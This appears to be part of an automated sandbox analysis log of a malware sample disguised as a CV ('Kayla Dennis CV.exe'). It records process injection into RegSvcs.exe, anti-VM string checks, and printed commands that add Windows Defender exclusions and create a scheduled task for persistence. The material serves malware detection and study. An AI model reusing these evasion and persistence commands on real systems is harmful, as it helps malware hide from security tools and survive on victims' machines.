                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596434
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437
                Source: RegSvcs.exe, 0000000B.00000002.3285264129.0000000001336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                Source: Kayla Dennis CV.exe, 00000000.00000002.2141784230.0000000007C50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000i
                Source: RegSvcs.exe, 00000011.00000002.3286353518.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563CE20 LdrInitializeThunk,17_2_0563CE20
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FF1008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9AF008Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Users\user\Desktop\Kayla Dennis CV.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformationJump to behavior
